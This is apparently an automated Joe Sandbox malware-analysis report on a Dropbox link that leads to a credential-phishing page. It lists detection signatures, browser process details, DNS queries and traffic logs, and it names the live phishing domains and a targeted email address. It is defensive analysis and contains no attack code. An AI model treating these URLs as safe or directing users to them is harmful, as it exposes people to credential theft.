Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbE

Overview

General Information

Sample URL:https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbE
Analysis ID:1517135
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
Phishing site detected (based on shot match)
Detected hidden input values containing email addresses (often used in phishing pages)
Detected non-DNS traffic on DNS port
Found iframes
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5784 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbE" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_632JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_632, type: DROPPED
    Source: https://aocds.ingenalsp.com/J8NtuOX/Matcher: Template: captcha matched
    Source: https://aocds.ingenalsp.com/J8NtuOX/Matcher: Template: captcha matched
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: jeremy@aocds.org
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: Iframe src: https://dropboxcaptcha.com
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: Number of links: 1
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://www.instagram.com/HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?dl=0&oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1HTTP Parser: Base64 decoded: 9e2c265482edab0dd25028prod
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: Title: does not match URL
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: <input type="password" .../> found
    Source: https://www.instagram.com/HTTP Parser: <input type="password" .../> found
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: No favicon
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: No favicon
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: No favicon
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: No favicon
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: No favicon
    Source: https://aocds.ingenalsp.com/J8NtuOX/HTTP Parser: No favicon
    Source: https://aocds.ingenalsp.com/J8NtuOX/HTTP Parser: No favicon
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: No <meta name="author".. found
    Source: https://www.instagram.com/HTTP Parser: No <meta name="author".. found
    Source: https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.instagram.com/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49779 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.16:50009 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.187:443 -> 192.168.2.16:50021 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:50040 version: TLS 1.2
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50047 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
    Source: global trafficDNS traffic detected: DNS query: cfl.dropboxstatic.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: www.dropboxstatic.com
    Source: global trafficDNS traffic detected: DNS query: fp.dropbox.com
    Source: global trafficDNS traffic detected: DNS query: use1-turn.fpjs.io
    Source: global trafficDNS traffic detected: DNS query: dropboxcaptcha.com
    Source: global trafficDNS traffic detected: DNS query: dropbox-api.arkoselabs.com
    Source: global trafficDNS traffic detected: DNS query: usersurvey.dropbox.com
    Source: global trafficDNS traffic detected: DNS query: cdn.sprig.com
    Source: global trafficDNS traffic detected: DNS query: api.sprig.com
    Source: global trafficDNS traffic detected: DNS query: paper.dropboxstatic.com
    Source: global trafficDNS traffic detected: DNS query: ucb77c37fdc994de353150108ec5.previews.dropboxusercontent.com
    Source: global trafficDNS traffic detected: DNS query: aocds.ingenalsp.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: 2lro.transenil.ru
    Source: global trafficDNS traffic detected: DNS query: instagram.com
    Source: global trafficDNS traffic detected: DNS query: www.instagram.com
    Source: global trafficDNS traffic detected: DNS query: static.cdninstagram.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
